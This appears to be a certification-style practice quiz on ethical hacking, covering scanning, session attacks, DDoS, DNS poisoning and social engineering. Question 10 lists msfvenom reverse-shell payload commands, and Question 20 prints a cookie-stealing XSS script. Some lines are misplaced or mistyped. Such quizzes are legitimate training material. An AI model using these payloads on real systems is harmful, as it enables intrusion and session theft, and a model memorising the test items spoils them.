Question 1
Question
Taylor, a security professional, uses a tool to monitor her company's website, website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?
Answer
-
WebSite-Watcher
-
Web-Stat
-
WAFWOOF
-
Webroot
Question 2
Question
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?
Answer
-
ARP ping scan
-
UDP Scan
-
ACK flag probe scan
-
TCP Maimon scan
Question 3
Question
What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?
Question 4
Question
Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment
details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario?
Answer
-
Session donation attack
-
Session fixation attack
-
forbidden attack
-
CRIME attack
Question 5
Question
Henry is a cyber security specialist hired by BlackEye - Cyber Security Solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.
Question 6
Question
By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?
Answer
-
profile
-
xsession-log
-
bash history
-
bashrc
Question 7
Question
A DDoS attack is performed at laver 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple requests to complete. Which attack is being described here?
connections and keeps waiting for the
Answer
-
Phlashing
-
Slowloris attack
-
Desynchronization
-
Session splicing
Question 8
Question
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?
Answer
-
The attacker uses TCP to poison the DNS resolver
-
The attacker makes a request to the DNS resolver
-
The attacker forges a reply from the DNS resolver
-
The attacker queries a nameserver using the DNS resolver
Question 9
Question
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?
Answer
-
Agent-based scanner
-
Network-based scanner
-
Proxy scanner
-
Cluster scanner
Question 10
Question
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
Answer
-
mstvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
-
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
-
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT-4444 -f exe
> shell.exe
-
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT-4444 -f exe>
shell.exe
Question 11
Question
Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?
Question 12
Question
Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation. Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella?
Question 13
Question
Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?
Answer
-
Towelroot
-
Knative
-
Bluto
-
ZANTI
Question 14
Question
In order to tailor your tests during a web-application scan, you decide to determine which the web-server version is hosting the application. On using the sV flag with Nmap, you obtain the following response:
80/tcp open http-proxy Apache Server 7.1.6
What information-gathering technique does this best describe?
Answer
-
Banner grabbing
-
Brute forcing
-
Dictionary attack
-
WHOIS lookup
Question 15
Question
Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. What type of malware did the attacker use to bypass the company's application whitelisting?
Answer
-
File-less malware
-
Phishing malware
-
Logic bomb malware
-
Zero-day malware
Question 16
Question
Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?
Answer
-
Hootsuite
-
VisualRoute
-
HULK
-
ophcrack
Question 17
Question
Which of the following bluetooth hacking techniques refers to the theft of information from a wireless device through bluetooth?
Answer
-
Bluesmacking
-
Bluebugging
-
Bluejacking
-
Bluesnarfing
Question 18
Question
Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online 2 and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network.
Which of the following Nmap commands must John use to perform the TCP SYN ping scan?
Answer
-
nmap -sn -PP < target IP address >
-
nmap -sn-PO < target IP address >
-
nmap -sn-PS< target IP address >
-
nmap -sn-PA < target IP address >
Question 19
Question
Which file is a rich target to discover the structure of a website during web-server
footprinting.
Answer
-
Index.html
-
robots.txt
-
domain.txt
-
document root
Question 20
Question
Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:
<script> document.write('<img src="https://localhost/submitcookie.php? cookie ='+
escape(document.cookie) + " />);
</script>
What issue occurred for the users who clicked on the image?
Answer
-
This php file silently executes the code and grabs the user's session cookie and session ID.
-
The code is a virus that is attempting to gather the user's username and password.
-
The code injects a new cookie to the browser.
-
The code redirects the user to another site.
Question 21
Question
An attacker redirects the victim to malicious websites by sending them a malicious link, by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?
Answer
-
Spoofing
-
Vishing
-
DDoS
-
Phishing
Question 22
Question
Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. in the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?
Answer
-
Cloud broker
-
Cloud auditor
-
Cloud consume
-
Cloud carrier
Question 23
Question
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario?
Answer
-
Phishing
-
Quid pro quo
-
Elicitation
-
Diversion theft
Question 24
Question
Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario?
Answer
-
Website defacement
-
Web cache poisoning
-
Session hijacking
-
Website mirroring
Question 25
Question
Allen, a professional pen tester, was hired by XpertTech Solutions to perform an attack simulation on the organization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration. Identify the NetBIOS code
used for obtaining the messenger service running for the logged-in user?